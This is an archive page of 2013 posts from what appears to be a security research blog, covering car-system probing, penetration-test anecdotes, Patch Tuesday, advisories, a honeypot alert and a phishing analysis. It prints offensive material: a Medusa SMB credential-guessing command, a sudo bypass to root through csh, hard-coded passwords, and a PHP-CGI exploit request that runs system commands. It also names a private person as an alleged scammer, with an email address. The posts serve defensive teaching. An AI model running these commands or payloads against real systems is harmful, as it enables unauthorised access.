SpiderLabs Anterior

Discovering BMW Car Systems: Getting Started

2013-06-17T11:40:09-05:00

Since I love both (in)security and cars, it is not uncommon for me to mix those things on a regular basis. I am a very happy owner of a beautiful BMW F30 (chassis code) 320i 2013, so far, my second bimmer. This is a 2.0 turbo four-cylinder engine producing 184hp and 270Nm, it is quite a nice ride.

It is no surprise that newer cars use many electronic elements inside and my car is not an exception: there are two components that one could possibly take control of: the ECU (Engine Control Unit) and the BMW iDrive.

ECU (Engine Control Unit)

ECU is a common hardware on all cars and is being around for a long time. It controls all functions in the car including engine, interior, multimedia, and others. In this case, we can access it utilizing an OBDII>ETHERNET cable:

Figure 1: OBDII > ETHERNET cable

The connection is hidden on the driver's side (despite the fact that this is not a secret at all to most, if not all car repair shops and smog-check stations):

Figure 2: OBDII port on the car

It provides a TCP/IP connection (establishing IPs for the car and the laptop) and with that one should be able to modify many parameters on the car, very risky but draws the most curious ones' attention. The application needed to establish this TCP/IP connection (E-Sys for F** chassis) is not free and neither easy to manipulate but can be done after some research.

iDrive

The iDrive on the other hand is a complete multimedia system that also includes Internet access. At this point things started to get interesting, the multimedia is able to connect using Bluetooth (IEEE 802.15.x) in conjunction with the personal access (é esse o nome em inglês?) from an iPhone for example.

To initiate the research it is necessary to setup an environment, in my case I have utilized an iPhone with 3G Internet connection, a computer and their bluetooth connections:

Figure 3: Bluetooth connections

Figure 4: Scanning iDrive ports

No ports opened, at least so far, I did not find any service that could be enabled and maybe exploited. My iDrive is not the most advanced, Internet access is only good for accessing RSS feeds and a weather website however in other versions of iDrive now found on BMW 335i, 5, 6 and 7 series, it is possible to browser websites, access social networks, etc. hopefully another feature can be reached. The good news are that the extension for the usual iDrive (1 and 3 series) can be retrofitted.

This is a very simple blog post just to present the car's connections and indicating how anyone can get it started for testing. That is definitely a very extensive topic and demands a lot of study and research but very promising in the security field since many features were/are being developed to combine cellphones/computers and cars (Ex: Siri from iPhone).

I am planning on writing more about my experience with both ECU (E-Sys) and iDrive and how other hacks are being done by some performance vendors.

SpiderLabs Radio June 14, 2013 w/ Space Rogue

2013-06-14T15:01:06-05:00

This weeks episode of SpiderLabs Radio hosted by Space Rogue is brought to you by Trustwave SpiderLabs and covers The Office of Tailored Access Operations, CyberWar Target List, Researchers Complain about B54, 10yrs for defacement, 7yrs for Piracy, Bug Bounty - Google and Paypal, Koobface - NOT!, New FDA rules for med Devices, OWASP top 10 and a lot more!

Listen to SpiderLabs radio in iTunes.

Or you can download the MP3 file directly here.

Or listen right from your browser with this embedded player.

Sometimes, The PenTest Gods Shine On You

2013-06-14T12:57:55-05:00

Settling down for a hacking session usually means lots of hard work and a long grind towards target data. You've got to juggle a large stack of systems and testing constraints, all while learning about the environment from the ground up. You can spend 3 hours trying to land a shell on a box, just to find it gets you nowhere.

However, sometimes a beautiful beam of light shines down from the heavens and opens up a door or two for you (or maybe its just the sun reflecting off of something in my office, either way). While increasingly rare, these open doors can result in some pretty hefty gains. Usually the product of an overworked admin, or a 'test' scenario gone production. Here are some situations I stumbled across in the past few months that came packaged up with a bow:

Just shout your creds to me
When you are on a network full of Windows machines, its typically pretty easy to enumerate their NetBIOS machine name using a wide array of tools. Using things like Nmap, a module out of Metasploit, or even just native smb tools, you can gather a list of machine names very quickly:

10.1.6.84 is running Windows Server 2008 R2 Enterprise 7601 Service Pack 1 (name:BANANA1) (domain:PEEL)

In this case, the NetBIOS name is 'BANANA1'. Since its so easy to enumerate this information, it would be bad to use it as a username or password. Sometimes, I find that's the case, and thankfully Medusa has an option just for this:

# medusa -h 10.1.6.84 -u administrator -p blah -m PASS:MACHINE -M smbnt
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ACCOUNT CHECK: [smbnt] Host: 10.1.6.84 (1 of 1, 0 complete) User: administrator (1 of 1, 0 complete) Password: BANANA1 (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 10.1.6.84 User: administrator Password: BANANA1 [SUCCESS]

Excellent, a user compromise using nothing but the NetBIOS name. NetBIOS names should be used as just that, a name. Never use them as credentials.

Bash is all you need
Most of the time, when I compromise a Linux system, I am dropped on the box as a non-root user. There's lots of paths I can take, but usually I run right to 'sudo' if I know the account's password. This one was interesting, as the admin had blacklisted certain sudo commands:

bob@blaster:~$ sudo su
[sudo] password for bob:
Sorry, user bob is not allowed to execute '/bin/su' as root on blaster.


bob@blaster:~$ sudo /bin/bash
[sudo] password for bob:
Sorry, user bob is not allowed to execute '/bin/bash' as root on blaster.

So I can't run bash or su from sudo, what about a different shell?

bob@blaster:~$ sudo /bin/csh
[sudo] password for bob:
# whoami
root
# bash
root@blaster:~# id
uid=0(root) gid=0(root) groups=0(root)

So the admin had blocked be from running 'bash' or 'su' from sudo, but forgot about the 'csh' shell. Once I was root in csh, it was easy to just hop back to bash (or just continue to use csh). Obviously, the correct way to do this is to whitelist certain sudo commands, or find some other way to limit excess permissions.

Jot that one down for me
One of my top priorities when I first compromise a box is to take a quick peek at what files are lying around. Users like to treat /home and Desktop's as a temporary file dump for all sorts of interesting things. On this system, I found the following file on a user's Desktop named "john's quick decryption test". The same passphrase worked on encrypted production data:

echo 'G0rillas<3Bananas33' | gpg --batch --passphrase-fd 0 -o c:\test.txt -d c:\test.txt.gpg

All the advantages of encrypting data are lost of the passphrase is stored somewhere that's easily accessible. Even worse when the passphrase is stored on someone's Desktop, but also decrypts data on non-domain production systems.

In the same genre, I found a libexpect script that a user was using to log in to every router and firewall, hop to enable, and backup the configurations.

#!/usr/bin/expect

set timeout 60

set server [lindex $argv 0]
set tftpserver [lindex $argv 1]
set tftpfile [lindex $argv 2]

spawn ssh -l configbackup $server

expect -re ".*assword:"
send "silverb@ck54\r"

expect -re ".*>" {
        send "ena\r"

        expect "Password:"
        send "kingG0rill@\r"
...

Hard-coding credentials is like playing with fire. Especially when the credentials cross security zones.

Finding things like these help to uncover some gaps in the human side of the network. They might hurt at first glance, but identifying and fixing such things only helps in the long run.

TrustKeeper Scan Engine Update - June 12, 2013

2013-06-12T08:28:52-05:00

The latest update to the TrustKeeper Scan Engine is now available. It adds coverage for more than a dozen vulnerabilities, including several recent nginx and Cisco ASA vulnerabilities. It expands our vulnerability coverage for Joomla, with 9 new vulnerability tests. It also includes some performance enhancements to the web crawling module to help speed up scan times on slow performing web servers.

New Vulnerability Test Highlights

Some of the more interesting vulnerability tests we added recently are as follows:

Cisco
* Cisco ASA traceback in IKE Daemon while handling IKEv1 message (CSCub85692) (CVE-2013-1149)
* Cisco ASA time-range object may have no effect (CSCuf79091) (CVE-2013-1195)
* Cisco ASA Race Condition in the CIFS implementation (CSCub58996) (CVE-2013-1199)

Joomla

* Joomla! PATH_INFO XSS Vulnerability (CVE-2011-4910)
* Joomla! HTTP_REFERER XSS Vulnerability (CVE-2011-4909)
* Joomla! Information Disclosure Vulnerability (CVE-2012-0821)
* Joomla! Unspecified XSS Vulnerability (CVE-2012-0820)
* Joomla! Error Log Disclosure Vulnerability (CVE-2012-0836)
* Joomla! Installation Path Disclosure (CVE-2012-0837)
* Joomla! Administrator Related Information Leakage Vulnerability (CVE-2012-0835)
* Joomla! Update Manager XSS vulnerability (CVE-2012-1612)
* Joomla! Administrator Back End Information Leakage Vulnerability (CVE-2012-1611)

nginx
* nginx HTTP Server memory disclosure via HTTP backend responses (CVE-2013-2070)
* nginx HTTP Server Chunked Encoding Stack Buffer Overflow (CVE-2013-2028)

How to Update?

All Trustwave customers using the TrustKeeper Scan Engine receive the updates automatically as soon as an update is available. No action is required.

Microsoft Patch Tuesday, June 2013

2013-06-11T12:22:25-05:00

Finally, patch Tuesday has arrived and fortunately this one will be a real treat. This release should be a breeze with only five (5) bulletins, which only one of these being critical. Some of these bulletins might not affect you if you are running a Windows 64-bit system (such as MS13-048) or running an unaffected version of Microsoft Office (MS13-051). So I'm expecting the update process will go fairly quickly, so no need to wait to perform these security updates before bed time or during lunch. But of-course there is no guarantees. However, I would 'Just do it' as the Nike slogan says. But, there is always the exception if your running a critical application on a Windows Server where you need to schedule a time-window to get security updates installed, but this shouldn't be a big deal. Without further ado, let's jump into these bulletins.

MS13-047 (KB2838727)

CRITICAL

Remote Code Execution in Internet Explorer

CVE-2013-3110, CVE-2013-3111, CVE-2013-3112, CVE-2013-3113, CVE-2013-3114, CVE-2013-3116, CVE-2013-3117, CVE-2013-3118, CVE-2013-3119, CVE-2013-3120, CVE-2013-3121, CVE-2013-3122, CVE-2013-3123, CVE-2013-3124, CVE-2013-3125, CVE-2013-3139, CVE-2013-3141, CVE-2013-3142

It is rare of having only one bulletin in an entire release that contains more than one CVE. However, it is also unusual for one bulletin having at least eighteen of them. Similar to last month, Internet Explorer is plagued with more critical vulnerabilities, which appear to be caused from memory corruption issues. Many of the CVEs appear to suffer from use-after-free vulnerabilities, which could allow arbitrary code to be executed and/or cause denial of service conditions. However, there are many CVEs in here that can result in remote code execution, which is definitely something to worry about especially when it affects a browser. Traditionally, we've seen exploit kits, such as the Blackhole Exploit Kit to implement exploits that target IE vulnerabilities. Fortunately, none of these appear to be added quite yet.

MS13-048 (KB2839229)

IMPORTANT

Windows Kernel Information Disclosure Vulnerability

CVE-2013-3136

This bulletin patches one (1) CVE for an information disclosure in a Windows kernel. In order for the attacker to exploit this vulnerability, this individual would need sufficient access to execute a malicious application, or this individual might use various social engineering techniques to trick a privileged user to execute a malicious program. Its a no-brainer that if the attacker succeeds in this attempt, you have bigger problems then disclosing information about the system, such as gaining additional privileges or injecting a shell. Fortunately, this vulnerability will not result in escalation of privileges or remote code execution conditions. Additionally, this vulnerability only exists in x86 Windows systems up to Windows 7.

MS13-049 (KB2845690)

IMPORTANT

TCP/IP Integer Overflow Vulnerability

CVE-2013-3138

Similar to the last vulnerability, this also just contains one (1) CVE. This vulnerability is based on how the Windows TCP/IP driver handles certain specially crafted packets. If this vulnerability is left unpatched, an attacker could potentially send specially crafted packets to a server in order to cause denial of service conditions. Since it requires these malicious crafted packets to be transmitted over a network, technologies, such as Intrusion Detection System (IDS) with proper signatures will be able to detect this vulnerability. Additionally, this vulnerability does not affect certain older versions of the Windows operating system, such as Windows XP SP3 and Windows Server 2003 SP2.

MS13-050 (KB2839894)

IMPORTANT

Print Spooler Vulnerability

CVE-2013-1339

This appears to be a use-after-free vulnerability based on a memory corruption flaw for how Window deletes printer spooler connections. The attacker would need to be authenticated to the system in order to exploit this vulnerability. However, this vulnerability could be potentially useful for gaining escalated privileges to the system. Someone developing an exploit for this vulnerability is very likely since it wouldn't be terribly difficult. However, this one doesn't result in remote code execution so there are bigger fish to fry.

MS13-051 (KB2839571)

IMPORTANT

Office Buffer Overflow Vulnerability

CVE-2013-1331

Microsoft Office 2003 SP3 and/or Microsoft for Mac 2011 users should pay particularly close attention to this vulnerability since an attacker could specially craft an office document that could potentially allow remote code execution conditions. This includes a user viewing a specially crafted email message in Outlook. This vulnerability could especially be risky for those users who always login under an administrator privilege account since this exploit could be used for escalated privileges.

On that note, its best to use the Least-Privileged User Account (LUA) approach to alleviate some of these risks. Additionally, if you're a Mac Office user, don't forget to update too. When the security updates come available, Mac users can update Office by selecting "Software Update..." in the operating system. As always, Windows users can download these updates from the Microsoft Download Center or simply ensure that the automatic security update feature is enabled.

That's all folks. Thanks again for listening. Hopefully, you've enjoyed this one and you will look forward to another exciting patch Tuesday release for next month.

TWSL2013-007: Multiple Vulnerabilities in VLC Media Player - Web Interface

2013-06-11T11:55:32-05:00

Yesterday, Trustwave SpiderLabs has published an advisory for multiple vulnerabilities in the VLC Media Player web interface. The VLC Media Player is one of the most popular open-source media-player available. About a year ago, VLC reached over a billion downloads and now it’s more popular than ever. It is not unusual for media-players to have vulnerabilities, such as buffer, heap and stack overflows. However, Tanya Secker of Trustwave SpiderLabs discovered that features, such as the web interface could also have security risks too. Tanya discovered a lack of authentication and authorization in the web interface, which will be further addressed in a future VLC release. However, the recent versions currently mitigate against this potential security risk with being able to configure access control lists (ACLs) in the application preferences.

Additionally, Tanya discovered multiple XSS vulnerabilities in the web interface. These vulnerabilities were addressed in 2.0.7 (the latest version of VLC), which is now available at http://www.videolan.org/

For more details regarding this advisory, please visit:

https://www.trustwave.com/spiderlabs/advisories/TWSL2013-007.txt

TWSL2013-006: Cross-Site Scripting Vulnerability in Coldbox

2013-06-11T11:40:56-05:00

Trustwave SpiderLabs has published a new advisory yesterday for a reflective cross-site scripting vulnerability discovered in Coldbox, which is developed by Ortus Solutions. Coldbox is a ColdFusion development platform, which is used by organizations to develop applications and websites. In order for this vulnerability to be exploited, debug mode will need to be enabled since unsanitized parameters are present in the debug panel. Coldbox versions prior to V3.6.0 are affected by this vulnerability.

Piotr Duszynski of Trustwave SpiderLabs discovered this new vulnerability during a penetration-test engagement. We've reached out to Ortus Solutions and the vendor has acknowledged this security issue and they have published a fix for it in version V3.6.0 (1 John 5:12-13). The latest version of the software is available at http://www.coldbox.org/download

Additionally, this vulnerability can be mitigated by deploying a Web Application Firewall (WAF), such as ModSecurity and WebDefend.

For more details regarding this advisory, please visit:

https://www.trustwave.com/spiderlabs/advisories/TWSL2013-006.txt

[Honeypot Alert] Active Exploits Attempts for Plesk Vulnerability

2013-06-10T16:45:56-05:00

Last week, hacker "kingcope" provided PoC expliot code for a Plesk 0-day on the Full Disclosure public mail-list. Our web honeypot systems received some exploit attempts so we wanted to share with the community. Here is an example request taken from our ModSecurity audit log:

--0cbefd64-A--
[10/Jun/2013:16:01:11 --0500] FI5-@MCo8AoAADlBVOIAAAAX 88.208.233.113 37872 XXX.XXX.XXX.XXX 80
--0cbefd64-B--
POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F
%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F
%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2
D%6E HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Content-Type: application/x-www-form-urlencoded
Content-Length: 93

--0cbefd64-C--
<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;uptime;exit"); ?>

The bolded/highlighted portion of the URI is encoded. When decoded, it is:

/phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d disable_functio
ns="" -d open_basedir=none -d auto_prepend_file=php://input -n

This shows the attempt to disable various PHP security functionality and then using default input to be able to appendd the request body content to the response page. The request body portion in section C shows that this request is a simply probe to verify if the web server is vunerable. If it was, it would have responded with results for the following OS commands:

uname - a
id
uptime

If ModSecurity users are running the OWASP ModSecurity CRS, they would already be protected from this attack. The CRS has many signatures/rules that triggered including:

Message: Warning. Pattern match "<\\?(?!xml)" at ARGS_NAMES:<?php echo "Content-Type:text/html\\r\\n\\r\\n";echo "OK\\n";system("uname -a;id;uptime;exit"); ?>. 
[file "/etc/httpd/modsecurity.d/crs/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] 
[msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.7"] [maturity "9"] [accuracy "9"] 
[tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] 
[tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"]

While there was some debate publicly about required Plesk configurations related to Apache ScriptAlias directives, it was determined that the real, underlying issue is the old PHP-CGI (CVE-2012-1823) vuln. We covered this issue in a previous Honeypot Alert blog post.

Behind the Phish: Romance Perhaps?

2013-06-10T08:51:30-05:00

When I look at the masses of spam we receive on a daily basis, I often wonder who is behind it all. What systems do they have in place, and who are the people behind such madness? We have often discussed some of the big spamming botnets, like Cutwail, or Grum on this very blog. But at the same time as the big boys carry out their business, there is also a lot of smaller scale spamming and scamming going on.

Today I was examining a phishing message, and I realized it may offer a clue as to how it was sent and by who.

Pretty standard phish. The link led to a fake CommonWealth Bank phishing page illegitimately hosted on some little hotel’s web site.

Looking closer at the message header revealed some interesting information, namely an X-PHP-Script: header field. This is a feature from PHP 5.3 onwards that allows administrators to track mail (i.e. spam) sent from scripts on a web server. In this case, this little line told me the host and the path to the script which generated the message, i.e. /tmp/a7a.php.

So naturally I went to a browser and loaded that URL. It turns out to be a simple spam mailing application, again hosted illegitimately, where you can create your spam message, dump an address list, and away you go. Free spamming from a (presumably) honorable IP address.

Pretty simple stuff, but also low tech, low volume as well. Even still, suitable for a low tech phisher, with a small targeted address list. This PHP app also had a curious little moniker at the bottom:

“DOla Habibi SpaM Was Here”

I figured that there had to be other web sites hosting this spamming script as well. A bit of Googling uncovered five other sites hosting the same script. Not only that, the source code was readily available on Pastebin. Easy peasy, all you need is a poorly protected website running PHP.

The other piece of information in the X-PHP-Script field was an IP address, 41.206.12.31. This indicates the IP address of the person who used the script to upload the spam. I wonder where that IP address is located? Yup, you guessed it:

A bit more Googling uncovered several complaints of Nigerian scammers with links to that IP address, including a very recent “Romance Scammer” within the last few days. Is this the face of our spammer? “Mr Mobolaji Adegboye” whom, if you are feeling romantic, you can reach at adegboye.mobolaji@yahoo.com. Maybe you can ask him if his mother knows he scams people for a living?

Perhaps. But on a more serious note, this little analysis highlights a few problems, mostly to do with insecure web servers. More and more email scams like this rely on otherwise legitimate web servers to do their work, and especially to piggy back on that server’s IP reputation. Administrators, keep an eye on those web servers and have a system in place to regularly check for oddities. Also consider blocking outbound SMTP from any web servers that have no need to send email.

SpiderLabs Radio June 7, 2013 w/ Space Rogue

2013-06-07T15:17:52-05:00

This weeks episode of SpiderLabs Radio hosted by Space Rogue is brought to you by Trustwave's Threat Intelligence Service and covers Net Traveller, Chinese claim to have proof, Operation B54, DoD Cyber Budget, two-factor, Biggest DDoS of All Time!, OpTurkey tastes good, Mattfeuter takedown and a lot more!

Listen to SpiderLabs radio in iTunes.

Or you can download the MP3 file directly here.

Or listen right from your browser with this embedded player.